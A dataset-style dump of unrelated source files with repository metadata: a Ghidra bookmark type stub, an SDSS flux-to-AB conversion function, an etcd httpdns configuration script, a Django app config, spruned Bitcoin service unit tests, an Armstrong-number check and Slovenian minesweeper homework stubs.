    def getAddress(self) -> ghidra.program.model.address.Address:
        """
        Returns address at which this bookmark is applied.
        """
        ...

    def getCategory(self) -> unicode:
        """
        Returns bookmark category
        """
        ...

    def getClass(self) -> java.lang.Class: ...

    def getComment(self) -> unicode:
        """
        Returns bookmark comment
        """
        ...

    def getId(self) -> long:
        """
        Returns the id of the bookmark.
        """
        ...

    def getType(self) -> ghidra.program.model.listing.BookmarkType:
        """
        Returns bookmark type object.
        """
        ...

    def getTypeString(self) -> unicode:
        """
        Returns bookmark type as a string
        """
        ...

    def hashCode(self) -> int: ...

    def notify(self) -> None: ...

    def notifyAll(self) -> None: ...

    def set(self, category: unicode, comment: unicode) -> None:
        """
        Set the category and comment associated with a bookmark.
        @param category category
        @param comment single line comment
        """
        ...

    def toString(self) -> unicode: ...

    @overload
    def wait(self) -> None: ...

    @overload
    def wait(self, __a0: long) -> None: ...

    @overload
    def wait(self, __a0: long, __a1: int) -> None: ...

    # Property views over the getter methods above (Jython bean-style access).
    @property
    def address(self) -> ghidra.program.model.address.Address: ...

    @property
    def category(self) -> unicode: ...

    @property
    def comment(self) -> unicode: ...

    @property
    def id(self) -> long: ...

    @property
    def type(self) -> ghidra.program.model.listing.BookmarkType: ...

    @property
    def typeString(self) -> unicode: ...
|
[
"[email protected]"
] | |
475b498730558cf3635706a19a5fa90410feb142
|
5e8a936891f0687a28425cef248a49480511119d
|
/pydl/photoop/sdssio/sdssflux2ab.py
|
47c8f6487d8d12f42405f6e9f4201e85ccf8ddba
|
[
"BSD-3-Clause"
] |
permissive
|
bsipocz/pydl
|
426a4cdae003b8c4e86249ec36005925d8ffa341
|
f8719699c71806f9b55dd41f843e5f35c64c770b
|
refs/heads/master
| 2020-12-07T15:43:01.554352 | 2015-09-24T03:15:14 | 2015-09-24T03:15:14 | 45,721,009 | 0 | 0 | null | 2015-11-07T03:30:30 | 2015-11-07T03:30:29 | null |
UTF-8
|
Python
| false | false | 1,515 |
py
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
def sdssflux2ab(flux, magnitude=False, ivar=False):
    """Convert SDSS calibrated fluxes (or magnitudes) to the AB system.

    Parameters
    ----------
    flux : :class:`numpy.ndarray`
        Array of calibrated fluxes or SDSS magnitudes whose last axis has
        5 columns corresponding to the 5 filters u, g, r, i, z.
    magnitude : :class:`bool`, optional
        If set to ``True``, then assume `flux` are SDSS magnitudes instead
        of linear flux units.
    ivar : :class:`numpy.ndarray`, optional
        If set, the input fluxes are actually inverse variances.

    Returns
    -------
    sdssflux2ab : :class:`numpy.ndarray`
        Array of fluxes or magnitudes on the AB system, same shape as `flux`.

    Notes
    -----
    Uses the conversions posted by D.Hogg (sdss-calib/845)::

        u(AB,2.5m) = u(2.5m) - 0.042
        g(AB,2.5m) = g(2.5m) + 0.036
        r(AB,2.5m) = r(2.5m) + 0.015
        i(AB,2.5m) = i(2.5m) + 0.013
        z(AB,2.5m) = z(2.5m) - 0.002
    """
    import numpy as np
    #
    # Correction vector, adjust this as necessary
    #
    correction = np.array([-0.042, 0.036, 0.015, 0.013, -0.002])
    abflux = flux.copy()
    if magnitude:
        # Magnitudes convert additively; broadcasting applies the per-filter
        # offset to every row (replaces the original explicit row loop and
        # also accepts any shape broadcastable against the 5 filters).
        abflux += correction
    else:
        factor = 10.0**(-correction/2.5)
        if ivar:
            # Inverse variance scales as 1/factor**2 when flux scales as factor.
            factor = 1.0/factor**2
        abflux *= factor
    return abflux
|
[
"[email protected]"
] | |
2029faea3ce5dd5bad299577b11c46950ad7913a
|
9ddee35a496f1b99d4f9b634711d30ad9f05a2fa
|
/case/httpdns/1070.py
|
7e2515e5721ac05c0e0485a9afdee9851e57738d
|
[] |
no_license
|
namesuqi/pirate
|
79824f231990030bdce9e092b300bb58d4ba0024
|
9308fbfa021f1238c2bd6faeb7d82c2934570140
|
refs/heads/master
| 2020-03-07T04:19:07.041355 | 2018-03-29T08:44:29 | 2018-03-29T08:44:29 | 127,263,075 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,818 |
py
|
#!/usr/bin/env python
# coding=utf-8
# author: zengyuetian
from libs.database.etcd_handler import *
if __name__ == "__main__":
    # Adjust to match the live configuration before running.
    # Maps every crazycdn service domain to its IP list with a 1800 s TTL
    # (stun2 points at a different host than the rest).
    ttl_conf_old = {"report.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 1800},
                    "channel.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 1800},
                    "upgradev2.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 1800},
                    "opt.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 1800},
                    "hls.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 1800},
                    "stats.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 1800},
                    "seeds.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 1800},
                    "vodtest.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 300},
                    "stun2.crazycdn.com": {"ips": {"default": ["118.190.148.163"]}, "ttl": 1800},
                    "live-ch.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 1800},
                    "ts.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 1800},
                    "control.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 1800},
                    "errlogs.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 1800}}
    # print(read_etcd_key('/business/httpdns/v2/domain_ip_map/default'))

    # NOTE(review): ttl_conf_1 (the 300 s TTL variant) is defined but never
    # pushed below -- presumably kept ready for a quick TTL switch; confirm
    # before deleting.
    ttl_conf_1 = {"report.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 300},
                  "channel.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 300},
                  "upgradev2.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 300},
                  "opt.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 300},
                  "hls.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 300},
                  "stats.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 300},
                  "seeds.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 300},
                  "vodtest.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 300},
                  "stun2.crazycdn.com": {"ips": {"default": ["118.190.148.163"]}, "ttl": 300},
                  "live-ch.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 300},
                  "ts.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 300},
                  "control.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 300},
                  "errlogs.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 300}}

    # Push the 1800 s map under the 'default' key of the httpdns etcd prefix.
    set_etcd_key('default', ttl_conf_old, '/business/httpdns/v2/domain_ip_map/')
|
[
"[email protected]"
] | |
0f4cf276661a0de3bf63c88b9d994d2d5f69c7d8
|
4b8724ec7bb224ff942264384dd7cb9c96676789
|
/car_project/apps/car_app/apps.py
|
5918e5de83ee63f6642071520899f8fe9ebc0126
|
[] |
no_license
|
JeffLawrence1/Python-Django-Advanced
|
b4822528bbaa5a235817121b32407c11408d8932
|
b41018d907f06aeb7ca05f1f4b030eedf58471e7
|
refs/heads/master
| 2020-03-09T07:59:11.954262 | 2018-04-08T20:15:45 | 2018-04-08T20:15:45 | 128,678,232 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 153 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.apps import AppConfig
class CarAppConfig(AppConfig):
    """Django application configuration for the ``car_app`` app."""

    # Dotted path of the application, as referenced from INSTALLED_APPS.
    name = 'car_app'
|
[
"[email protected]"
] | |
135cfce1a38a80aef2ddbb1e9113a1026fd178bc
|
b4af2cf7457ab6fe8e5b31cdc8bfcbb0081238f3
|
/test/test_application/test_vo_service.py
|
34998a707ae04be2b8436b46e27fceed839230b9
|
[
"MIT"
] |
permissive
|
osthafen/spruned
|
aa13fe8568efe17877c5971ea785d0c0decc619b
|
2094fd66fd590bd1487fbb284ce5c6e979986a90
|
refs/heads/master
| 2020-03-27T22:41:24.699583 | 2018-09-03T20:52:08 | 2018-09-03T20:52:08 | 147,252,407 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 21,857 |
py
|
import asyncio
import io
import json
import unittest
from unittest.mock import Mock, create_autospec
import binascii
from pycoin.block import Block
from spruned import settings
from spruned.application.cache import CacheAgent
from spruned.application.exceptions import ServiceException, InvalidPOWException
from spruned.application.spruned_vo_service import SprunedVOService
from spruned.daemon.exceptions import ElectrodMissingResponseException
from test.utils import async_coro
class TestVOService(unittest.TestCase):
def setUp(self):
self.loop = asyncio.get_event_loop()
self.electrod = Mock()
self.p2p = Mock()
self.repository = Mock()
self.cache = create_autospec(CacheAgent)
self.sut = SprunedVOService(
self.electrod, self.p2p, cache=self.cache, repository=self.repository
)
hb = '000000206ad001ecab39a3267ac6db2ccea9e27907b011bc70324c00000000000000000048043a6a' \
'574d8d826af9477804d3a4ac116a411d194c0b86d950168163c4d4232364ad5aa38955175cd60695'
hh = '000000000000000000376267d342878f869cb68192ff5d73f5f1953ae83e3e1e'
hb = binascii.unhexlify(hb.encode())
self.header = {
'header_bytes': hb,
'block_hash': hh,
'block_height': 513979,
'prev_block_hash': '0000000000000000004c3270bc11b00779e2a9ce2cdbc67a26a339abec01d06a'
}
self.response_header = {
'bits': 391481763,
'chainwork': 'Not Implemented Yet',
'confirmations': 2,
'difficulty': 'Not Implemented Yet',
'hash': '000000000000000000376267d342878f869cb68192ff5d73f5f1953ae83e3e1e',
'height': 513979,
'mediantime': 1521312803,
'merkleroot': '23d4c463811650d9860b4c191d416a11aca4d3047847f96a828d4d576a3a0448',
'nextblockhash': None,
'nonce': 2500253276,
'previousblockhash': '0000000000000000004c3270bc11b00779e2a9ce2cdbc67a26a339abec01d06a',
'time': 1521312803,
'version': 536870912,
'versionHex': 'Not Implemented Yet'
}
def tearDown(self):
self.electrod.reset_mock()
self.repository.reset_mock()
def test_getblock_not_found(self):
self.repository.headers.get_block_header.return_value = None
block = self.loop.run_until_complete(
self.sut.getblock('00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048', 1)
)
self.assertEqual(block, None)
def test_getblock_full_verbose(self):
self.repository.headers.get_block_header.return_value = None
with self.assertRaises(NotImplementedError):
self.loop.run_until_complete(
self.sut.getblock('00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048', 2)
)
def test_getblock_verbose(self):
header_hex = '010000006fe28c0ab6f1b372c1a6a246ae63f74f931e8365e15a089c68d6190000000000982051' \
'fd1e4ba744bbbe680e1fee14677ba1a3c3540bf7b1cdb606e857233e0e61bc6649ffff001d01e36299'
block_json = {
"hash": "00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048",
"height": 1,
"version": 1,
"versionHex": "Not Implemented Yet",
"merkleroot": "0e3e2357e806b6cdb1f70b54c3a3a17b6714ee1f0e68bebb44a74b1efd512098",
"time": 1231469665,
"mediantime": 1231469665,
"nonce": 2573394689,
"bits": 486604799,
"difficulty": "Not Implemented Yet",
"chainwork": "Not Implemented Yet",
"previousblockhash": "000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f",
"nextblockhash": "000000006a625f06636b8bb6ac7b960a8d03705d1ace08b1a19da3fdcc99ddbd",
"tx": [
"0e3e2357e806b6cdb1f70b54c3a3a17b6714ee1f0e68bebb44a74b1efd512098"
]
}
self.repository.headers.get_best_header.return_value = {'block_height': 513980}
self.repository.headers.get_block_header.return_value = {
'block_hash': block_json['hash'],
'block_height': block_json['height'],
'header_bytes': binascii.unhexlify(header_hex.encode()),
'next_block_hash': block_json['nextblockhash']
}
hex_block ='010000006fe28c0ab6f1b372c1a6a246ae63f74f931e8365e15a089c68d6190000000000982051fd1e4ba744bbbe6' \
'80e1fee14677ba1a3c3540bf7b1cdb606e857233e0e61bc6649ffff001d01e3629901010000000100000000000000' \
'00000000000000000000000000000000000000000000000000ffffffff0704ffff001d0104ffffffff0100f2052a0' \
'100000043410496b538e853519c726a2c91e61ec11600ae1390813a627c66fb8be7947be63c52da7589379515d4e0' \
'a604f8141781e62294721166bf621e73a82cbf2342c858eeac00000000'
block_bytes = binascii.unhexlify(hex_block.encode())
self.repository.blockchain.get_block.return_value = {
'block_hash': '00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048',
'block_bytes': block_bytes
}
block = self.loop.run_until_complete(
self.sut.getblock('00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048', 1)
)
block_json = {
"hash": "00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048",
"height": 1,
"version": 1,
"versionHex": "Not Implemented Yet",
"merkleroot": "0e3e2357e806b6cdb1f70b54c3a3a17b6714ee1f0e68bebb44a74b1efd512098",
"time": 1231469665,
"mediantime": 1231469665,
"nonce": 2573394689,
"bits": 486604799,
"difficulty": "Not Implemented Yet",
"chainwork": "Not Implemented Yet",
"previousblockhash": "000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f",
"nextblockhash": "000000006a625f06636b8bb6ac7b960a8d03705d1ace08b1a19da3fdcc99ddbd",
"tx": [
"0e3e2357e806b6cdb1f70b54c3a3a17b6714ee1f0e68bebb44a74b1efd512098"
]
}
self.assertEqual(block, block_json)
def test_getblock_non_verbose(self):
self.repository.headers.get_best_header.return_value = {'block_height': 513980}
self.repository.headers.get_block_header.return_value = self.header
self.repository.blockchain.get_block.return_value = {
'block_hash': '000000000000000000376267d342878f869cb68192ff5d73f5f1953ae83e3e1e',
'block_bytes': binascii.unhexlify('cafebabe'.encode())
}
block = self.loop.run_until_complete(
self.sut.getblock('000000000000000000376267d342878f869cb68192ff5d73f5f1953ae83e3e1e', 0)
)
self.assertEqual(block, 'cafebabe')
def test_getblock_p2p_non_verbose(self):
hex_block ='010000006fe28c0ab6f1b372c1a6a246ae63f74f931e8365e15a089c68d6190000000000982051fd1e4ba744bbbe6' \
'80e1fee14677ba1a3c3540bf7b1cdb606e857233e0e61bc6649ffff001d01e3629901010000000100000000000000' \
'00000000000000000000000000000000000000000000000000ffffffff0704ffff001d0104ffffffff0100f2052a0' \
'100000043410496b538e853519c726a2c91e61ec11600ae1390813a627c66fb8be7947be63c52da7589379515d4e0' \
'a604f8141781e62294721166bf621e73a82cbf2342c858eeac00000000'
bytes_block = binascii.unhexlify(hex_block.encode())
self.repository.headers.get_best_header.return_value = {'block_height': 513980}
self.repository.headers.get_block_header.return_value = self.header
self.repository.blockchain.get_block.return_value = None
self.repository.blockchain.async_save_block.return_value = async_coro(True)
self.p2p.get_block.side_effect = [
async_coro(None),
async_coro(
{
'block_hash': '00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048',
'block_bytes': bytes_block,
'block_object': Block.parse(io.BytesIO(bytes_block))
}
)
]
block = self.loop.run_until_complete(
self.sut.getblock('000000000000000000376267d342878f869cb68192ff5d73f5f1953ae83e3e1e', 0)
)
self.assertEqual(block, hex_block)
def test_getblock_p2p_non_verbose_network_error(self):
self.repository.headers.get_best_header.return_value = {'block_height': 513980}
self.repository.headers.get_block_header.return_value = self.header
self.repository.blockchain.get_block.return_value = None
self.p2p.get_block.side_effect = lambda *a, **kw: async_coro(None)
with self.assertRaises(ServiceException):
self.loop.run_until_complete(
self.sut.getblock('000000000000000000376267d342878f869cb68192ff5d73f5f1953ae83e3e1e', 0)
)
def test_getrawtransaction_non_verbose_not_in_block(self):
self.repository.blockchain.get_json_transaction.return_value = None
tx = {
'hex': '01000000000101531213685738c91df5ceb1537605b4e17d0e623c34ead12b9e285495cd5da9b80000000000ffffffff0248d'
'00500000000001976a914fa511ca56ee17f57b8190ad490c4e5bf7ef0e34b88ac951e00000000000016001458e05b9b412c3b'
'4f35bdb54f47376beaeb8f81aa024830450221008a6edb6ce73676d4065ffb810f3945b3c3554025d3d7545bfca7185aaff62'
'0cc022066e2f0640aeb0775e4b47701472b28d1018b4ab8fd688acbdcd757b75c2731b6012103dfc2e6847645ca8057120780'
'e5ae6fa84be76b39465cd2a5158d1fffba78b22600000000'
}
self.electrod.getrawtransaction.return_value = async_coro(tx)
res = self.loop.run_until_complete(
self.sut.getrawtransaction(
'dbae729fc6cce1bc922e66f4f12eb2b43ef57406bf5a0818eb2e73696b713b91',
verbose=False
)
)
self.assertEqual(res, tx['hex'])
def test_getrawtransaction_verbose_not_in_block(self):
self.repository.get_block_header.return_value = self.header
self.repository.blockchain.get_json_transaction.return_value = None
tx = {
'hex': '01000000000101531213685738c91df5ceb1537605b4e17d0e623c34ead12b9e285495cd5da9b80000000000ffffffff0248d'
'00500000000001976a914fa511ca56ee17f57b8190ad490c4e5bf7ef0e34b88ac951e00000000000016001458e05b9b412c3b'
'4f35bdb54f47376beaeb8f81aa024830450221008a6edb6ce73676d4065ffb810f3945b3c3554025d3d7545bfca7185aaff62'
'0cc022066e2f0640aeb0775e4b47701472b28d1018b4ab8fd688acbdcd757b75c2731b6012103dfc2e6847645ca8057120780'
'e5ae6fa84be76b39465cd2a5158d1fffba78b22600000000'
}
self.repository.get_best_header.return_value = {'block_height': 513980}
self.electrod.getrawtransaction.return_value = async_coro(tx)
res = self.loop.run_until_complete(
self.sut.getrawtransaction(
'dbae729fc6cce1bc922e66f4f12eb2b43ef57406bf5a0818eb2e73696b713b91',
verbose=True
)
)
self.assertEqual(res, tx)
def test_getrawtransaction_verbose_in_block(self):
header_hex = '010000006fe28c0ab6f1b372c1a6a246ae63f74f931e8365e15a089c68d6190000000000982051' \
'fd1e4ba744bbbe680e1fee14677ba1a3c3540bf7b1cdb606e857233e0e61bc6649ffff001d01e36299'
block_json = {
"hash": "00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048",
"height": 1,
"version": 1,
"versionHex": "Not Implemented Yet",
"merkleroot": "0e3e2357e806b6cdb1f70b54c3a3a17b6714ee1f0e68bebb44a74b1efd512098",
"time": 1231469665,
"mediantime": 1231469665,
"nonce": 2573394689,
"bits": 486604799,
"difficulty": "Not Implemented Yet",
"chainwork": "Not Implemented Yet",
"previousblockhash": "000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f",
"nextblockhash": "000000006a625f06636b8bb6ac7b960a8d03705d1ace08b1a19da3fdcc99ddbd",
"tx": [
"0e3e2357e806b6cdb1f70b54c3a3a17b6714ee1f0e68bebb44a74b1efd512098"
]
}
self.repository.headers.get_best_header.return_value = {'block_height': 513980}
self.repository.headers.get_block_header.return_value = {
'block_hash': block_json['hash'],
'block_height': block_json['height'],
'header_bytes': binascii.unhexlify(header_hex.encode()),
'next_block_hash': block_json['nextblockhash']
}
self.repository.get_block_header.return_value = self.header
self.repository.blockchain.get_json_transaction.return_value = None
tx = {
'hex': '01000000010000000000000000000000000000000000000000000000000000000000000000ffffffff0704ffff00'
'1d0104ffffffff0100f2052a0100000043410496b538e853519c726a2c91e61ec11600ae1390813a627c66fb8be7'
'947be63c52da7589379515d4e0a604f8141781e62294721166bf621e73a82cbf2342c858eeac00000000',
'blockhash': '00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048',
'confirmations': 6
}
self.repository.get_best_header.return_value = {'block_height': 513980}
self.electrod.getrawtransaction.return_value = async_coro(tx)
self.electrod.get_merkleproof.return_value = async_coro({'block_height': 1, 'merkle': [], 'pos': 0})
res = self.loop.run_until_complete(
self.sut.getrawtransaction(
'0e3e2357e806b6cdb1f70b54c3a3a17b6714ee1f0e68bebb44a74b1efd512098',
verbose=True
)
)
self.assertEqual(res, tx)
def test_getrawtransaction_verbose_in_block_invalid_pow(self):
header_hex = '010000006fe28c0ab6f1b372c1a6a246ae63f74f931e8365e15a089c68d6190000000000982051' \
'fd1e4ba744bbbe680e1fee14677ba1a3c3540bf7b1cdb606e857233e0e61bc6649ffff001d01e36299'
block_json = {
"hash": "00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048",
"height": 1,
"version": 1,
"versionHex": "Not Implemented Yet",
"merkleroot": "0e3e2357e806b6cdb1f70b54c3a3a17b6714ee1f0e68bebb44a74b1efd512098",
"time": 1231469665,
"mediantime": 1231469665,
"nonce": 2573394689,
"bits": 486604799,
"difficulty": "Not Implemented Yet",
"chainwork": "Not Implemented Yet",
"previousblockhash": "000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f",
"nextblockhash": "000000006a625f06636b8bb6ac7b960a8d03705d1ace08b1a19da3fdcc99ddbd",
"tx": [
"0e3e2357e806b6cdb1f70b54c3a3a17b6714ee1f0e68bebb44a74b1efd512098"
]
}
self.repository.headers.get_best_header.return_value = {'block_height': 513980}
self.repository.headers.get_block_header.return_value = {
'block_hash': block_json['hash'],
'block_height': block_json['height'],
'header_bytes': binascii.unhexlify(header_hex.encode()),
'next_block_hash': block_json['nextblockhash']
}
self.repository.get_block_header.return_value = self.header
self.repository.blockchain.get_json_transaction.return_value = None
tx = {
'hex': '01000000010000000000000000000000000000000000000000000000000000000000000000ffffffff0704ffff00'
'1d0104ffffffff0100f2052a0100000043410496b538e853519c726a2c91e61ec11600ae1390813a627c66fb8be7'
'947be63c52da7589379515d4e0a604f8141781e62294721166bf621e73a82cbf2342c858eeac00000000',
'blockhash': '00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048',
'confirmations': 6
}
self.repository.get_best_header.return_value = {'block_height': 513980}
self.electrod.getrawtransaction.return_value = async_coro(tx)
self.electrod.get_merkleproof.return_value = async_coro({'block_height': 1, 'merkle': ['ff'*32], 'pos': 0})
with self.assertRaises(InvalidPOWException):
self.loop.run_until_complete(
self.sut.getrawtransaction(
'0e3e2357e806b6cdb1f70b54c3a3a17b6714ee1f0e68bebb44a74b1efd512098',
verbose=True
)
)
def test_getbestblockhash(self):
self.repository.headers.get_best_header.return_value = {'block_hash': 'cafebabe'}
res = self.loop.run_until_complete(self.sut.getbestblockhash())
self.assertEqual(res, 'cafebabe')
def test_getblockhash(self):
self.repository.headers.get_block_hash.return_value = 'cafebabe'
res = self.loop.run_until_complete(self.sut.getblockhash(123))
self.assertEqual(res, 'cafebabe')
def test_getblockheader(self):
self.repository.headers.get_best_header.return_value = {'block_height': 513980}
self.repository.headers.get_block_header.return_value = self.header
res = self.loop.run_until_complete(
self.sut.getblockheader(
'000000000000000000376267d342878f869cb68192ff5d73f5f1953ae83e3e1e'
)
)
self.assertEqual(
res,
self.response_header
)
def test_block_count(self):
self.repository.headers.get_best_header.return_value = {'block_height': 6}
res = self.loop.run_until_complete(self.sut.getblockcount())
self.assertEqual(res, 6)
def test_estimatefee(self):
self.electrod.estimatefee.side_effect = [ElectrodMissingResponseException(), async_coro('fee estimation')]
res = self.loop.run_until_complete(self.sut.estimatefee(6))
self.assertEqual(res, 'fee estimation')
def test_getbestblockheader(self):
self.repository.headers.get_best_header.return_value = {
'block_height': 513980,
'block_hash': '0000000000000000001a0822fbaef92ef048967fa32c68f96e3d57d13183ef2b'
}
self.repository.headers.get_block_header.return_value = self.header
res = self.loop.run_until_complete(self.sut.getbestblockheader(verbose=False))
self.assertEqual(
res,
'000000206ad001ecab39a3267ac6db2ccea9e27907b011bc70324c00000000000000000048043a6a'
'574d8d826af9477804d3a4ac116a411d194c0b86d950168163c4d4232364ad5aa38955175cd60695'
)
res = self.loop.run_until_complete(self.sut.getbestblockheader(verbose=True))
self.assertEqual(res, self.response_header)
def test_getblockchaininfo(self):
from spruned import __version__ as spruned_version
from spruned import __bitcoind_version_emulation__ as bitcoind_version
self.repository.headers.get_best_header.return_value = self.header
self.p2p.bootstrap_status = 0
res = self.loop.run_until_complete(self.sut.getblockchaininfo())
self.assertEqual(
res,
{
'chain': 'main',
'warning': 'spruned {}, emulating bitcoind v{}'.format(spruned_version, bitcoind_version),
'blocks': 513979,
'headers': 513979,
'bestblockhash': '000000000000000000376267d342878f869cb68192ff5d73f5f1953ae83e3e1e',
'difficulty': None,
'chainwork': None,
'mediantime': 1521312803,
'verificationprogress': 0,
'pruned': False
}
)
def test_gettxout(self):
tx = '01000000010000000000000000000000000000000000000000000000000000000000000000ffffffff0704ffff00' \
'1d0104ffffffff0100f2052a0100000043410496b538e853519c726a2c91e61ec11600ae1390813a627c66fb8be7' \
'947be63c52da7589379515d4e0a604f8141781e62294721166bf621e73a82cbf2342c858eeac00000000'
self.repository.get_best_header.return_value = {'block_height': 513980}
self.electrod.getrawtransaction.return_value = async_coro(tx)
self.repository.blockchain.get_transaction.return_value = None
self.electrod.listunspents_by_scripthash.side_effect = [ElectrodMissingResponseException,
async_coro(
[{'tx_hash': '0e3e2357e806b6cdb1f70b54c3a3a17b6714ee1f0e68bebb44a74b1efd512098',
'tx_pos': 0, 'height': 0, 'value': 1}]
)]
self.repository.headers.get_best_header.return_value = {
'block_height': 513980, 'block_hash': '0000000000000000001a0822fbaef92ef048967fa32c68f96e3d57d13183ef2b'
}
res = self.loop.run_until_complete(
self.sut.gettxout(
'0e3e2357e806b6cdb1f70b54c3a3a17b6714ee1f0e68bebb44a74b1efd512098', 0
)
)
self.assertEqual(
res,
{
"bestblock": "0000000000000000001a0822fbaef92ef048967fa32c68f96e3d57d13183ef2b",
"confirmations": 513980,
"value": "0.00000001",
"scriptPubKey": {
"asm": "",
"hex": "410496b538e853519c726a2c91e61ec11600ae1390813a627c66fb8be7947be63c52da7"
"589379515d4e0a604f8141781e62294721166bf621e73a82cbf2342c858eeac",
"reqSigs": 0,
"type": "",
"addresses": []
}
}
)
|
[
"[email protected]"
] | |
82c22ab3f3403a1a2baf72e25753d76f9ac0fb61
|
761b013bc7cd98850f3f26e3f0b0a8e4ec8fdf7d
|
/arm.py
|
833bd4af8bd165347ac2ea8e3bc4affa52299173
|
[] |
no_license
|
tjmode/placement
|
72e6bca120cb785cac3fc829d84b921af8add01a
|
ac5af6394e74212bf44510af837a144254ca2f99
|
refs/heads/master
| 2020-04-15T16:36:03.489076 | 2019-07-31T06:14:51 | 2019-07-31T06:14:51 | 164,842,584 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 189 |
py
|
num = int(input())
order = len(str(num))
sum = 0
temp = num
while temp > 0:
digit = temp % 10
sum += digit ** order
temp //= 10
if num == sum:
print("yes")
else:
print("no")
|
[
"[email protected]"
] | |
f0e6d7d0c53802aa01ca3c267ba04ebe3f7bb546
|
99c4d4a6592fded0e8e59652484ab226ac0bd38c
|
/code/batch-1/vse-naloge-brez-testov/DN7-M-182.py
|
4b4ce11c5808c697cbb1e47ed4e9be02e9751e48
|
[] |
no_license
|
benquick123/code-profiling
|
23e9aa5aecb91753e2f1fecdc3f6d62049a990d5
|
0d496d649247776d121683d10019ec2a7cba574c
|
refs/heads/master
| 2021-10-08T02:53:50.107036 | 2018-12-06T22:56:38 | 2018-12-06T22:56:38 | 126,011,752 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,845 |
py
|
# To funkcijo prijazno podarjam vsem, ki bodo programirali v eni vrstici. :)
# Kako jo uporabiti, je v navodilih. Kdor je ne potrebuje, naj jo ignorira.
def vsa_polja(s, v):
"""
Generiraj vse koordinate (x, y) za polje s podano širino in višino
Args:
s (int): širina
v (int): višina
Returns:
generator parov polj
"""
return ((x, y) for x in range(s) for y in range(v))
########################
# Za oceno 6
def sosedov(x, y, mine):
"""
Vrni število sosedov polja s koordinatami `(x, y)` na katerih je mina.
Polje samo ne šteje.
Args:
x (int): koordinata x
y (int): koordinata y
mine (set of tuple of int): koordinate min
Returns:
int: število sosedov
"""
def najvec_sosedov(mine, s, v):
"""
Vrni koordinati polja z največ sosednjih min
Args:
mine (set of (int, int)): koordinate min
s (int): širina polja
v (int): višina polja
Returns:
tuple of int: koordinati polja
"""
def brez_sosedov(mine, s, v):
"""
Vrni množico koordinat polj brez min na sosednjih poljih. Polje samo lahko
vsebuje mino.
Args:
mine (set of tuple of int): koordinate min
s (int): širina polja
v (int): višina polja
Returns:
set of tuple: polja brez min na sosednjih poljih
"""
def po_sosedih(mine, s, v):
"""
Vrni slovar, katerega ključi so možna števila sosednjih polj z minami
(torej števila od 0 do 8), vrednosti pa množice koordinat polj s toliko
sosedami.
Args:
mine (set of tuple of int): koordinate min
s (int): širina polja
v (int): višina polja
Returns:
dict: (glej zgoraj)
"""
########################
# Za oceno 7
def dolzina_poti(pot):
"""
Vrni dolžino podane poti, vključno z vmesnimi polji.
Args:
pot (list of tuple): seznam koordinat polj
Returns:
int: dolžina poti
"""
def varen_premik(x0, y0, x1, y1, mine):
"""
Vrni `True`, če je pomik z (x0, y0) and (x1, y1) varen, `False`, če ni.
Args:
x0 (int): koordinata x začetnega polja
y0 (int): koordinata y začetnega polja
x1 (int): koordinata x končnega polja
y1 (int): koordinata y končnega polja
mine (set of tuple of int): koordinate min
Returns:
bool: `True`, če je premik varen, `False`, če ni.
"""
def varna_pot(pot, mine):
"""
Vrni `True`, če je podana pot varna, `False`, če ni.
Args:
pot (list of tuple of int): koordinate točk na poti (brez vmesnih točk)
mine (set of tuple of int): koordinate min
Returns:
bool: `True`, če je pot varna, `False`, če ni.
"""
########################
# Za oceno 8
def polje_v_mine(polje):
"""
Vrni koordinate min v podanem polju.
Niz polje opisuje polje tako, da so vodoravne "vrstice" polja ločene s
presledki. Prosta polja so označena z znako `.`, mine z `X`.
Args:
polje (str): polje
Returns:
mine (set of tuple of int): koordinate min
